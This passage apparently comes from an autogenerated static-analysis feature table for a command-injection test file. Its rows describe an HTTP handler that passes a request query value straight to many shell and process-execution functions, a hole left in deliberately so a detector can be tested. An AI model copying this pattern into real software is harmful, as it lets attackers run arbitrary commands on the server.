autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | exceptional return of require ... ll(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:13:8:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:22:8:26 | shell | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:22:8:26 | shell | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:22:8:26 | shell | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:22:8:26 | shell | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:22:8:26 | shell | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | CalleeFlexibleAccessPath | import(!).shell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:28:8:30 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:30 | require ... ellSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:30 | require ... ellSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:30 | require ... ellSync | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:30 | require ... ellSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:30 | require ... ellSync | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | exceptional return of require ... nc(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | exceptional return of require ... nc(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | exceptional return of require ... nc(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | exceptional return of require ... nc(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | exceptional return of require ... nc(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:13:9:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:22:9:30 | shellSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:22:9:30 | shellSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:22:9:30 | shellSync | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:22:9:30 | shellSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:22:9:30 | shellSync | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | CalleeFlexibleAccessPath | import(!).shellSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:32:9:34 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:27 | require ... .stdout | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:27 | require ... .stdout | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:27 | require ... .stdout | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:27 | require ... .stdout | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:27 | require ... .stdout | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | exceptional return of require ... ut(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | exceptional return of require ... ut(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | exceptional return of require ... ut(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | exceptional return of require ... ut(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | exceptional return of require ... ut(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:13:10:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:22:10:27 | stdout | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:22:10:27 | stdout | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:22:10:27 | stdout | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:22:10:27 | stdout | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:22:10:27 | stdout | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | CalleeFlexibleAccessPath | import(!).stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:29:10:31 | cmd | fileImports | 